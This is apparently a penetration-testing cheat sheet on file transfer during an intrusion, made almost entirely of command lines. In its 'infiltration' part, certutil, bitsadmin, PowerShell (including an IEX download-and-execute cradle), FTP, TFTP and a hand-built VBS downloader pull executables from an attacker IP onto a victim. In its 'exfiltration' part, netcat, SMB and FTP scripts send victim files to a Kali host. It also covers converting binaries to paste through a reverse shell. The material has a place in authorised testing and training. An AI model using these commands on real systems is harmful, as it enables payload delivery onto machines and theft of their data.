File Transfer
tip
In case of physical access think about USB port (USB key and smartphone), direct Wi-Fi, Bluetooth and SD card.
Listenersâ
Windowsâ
nc -lvp <port> < <file>
Linuxâ
info
Check the linux listeners used for file transfer.
Infiltration - Downloadersâ
SMBâ
\\<ip>\<share>\<file>
copy \\<ip>\<share>\<file> <file>
Mount a temporary network share
net share NetworkFiles=<C:\<...>\<share_folder> /grant:everyone,full
Sysinternalsâ
bitsadmin /transfer mydownloadjob /download /priority normal <http://attackerIP/executable.exe> <C:\\Users\\%USERNAME%\\AppData\\local\\temp\\executable.exe>
certutil.exe -urlcache -split -f <URL> <output.file>
certutil.exe -encode <original_file> <b64encoded_file>
certutil.exe -decode <file.txt> <file.exe>
Executablesâ
notepad.exe <url>
PowerShellâ
(New-Object System.Net.WebClient).DownloadFile("<http://server/file.txt>", "<C:\Windows\Temp\file.txt>")
Invoke-WebRequest "<http://server/file.txt>" -OutFile "<C:\Windows\Temp\file.txt>"
$browser = New-Object System.Net.WebClient;
$browser.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
IEX($browser.DownloadString('<http://server/file.txt>'));
echo $storageDir = $pwd > get.ps1
echo $webclient = New-Object System.Net.WebClient >> get.ps1
echo $url = "<url>" >> get.ps1
echo $file = "<filename>" >> get.ps1
echo $webclient.DownloadFile($url,$file) >> get.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File get.ps1
FTPâ
echo open <attackerip> 21> ftp.txt
echo USER <username> <password> >> ftp.txt
echo bin >> ftp.txt
echo GET <evil.exe> >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt
TFTPâ
In Kali
service atftpd start
atftpd --daemon --port 69 /tftp
/etc/init.d/atftpd restart
auxiliary/server/tftp
Enable TFTP
pkgmgr /iu:"TFTP"
tftp -i <ip_target> GET <nc.exe>
VBSâ
tip
Do unix2dos before copying it.
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
cscript wget.vbs <url> <out_file>
Debug.exeâ
The file to upload must be under the 64K limit.
upx -9 <file.exe>
/usr/share/windows-binaries/exe2bat.exe <file.exe> <file.txt>
Then copy paste in your reverse shell to create the file on the target.
Exfiltrationâ
tip
If not mentionned, the first CLI is from victim and the second from Kali.
copy <file> \\<ip>\<share>\
smbserver.py <share> .
nc <ip> <port> < <file>
nc -lvp <port> > <file>
echo open <ip> > ftp.bat
echo <user> >>ftp.bat
echo <pass> >>ftp.bat
echo binary >>ftp.bat
echo mput <C:\Users\user\desktop\test.txt> >>ftp.bat
echo quit >>ftp.bat
ftp -i -s:.\ftp.bat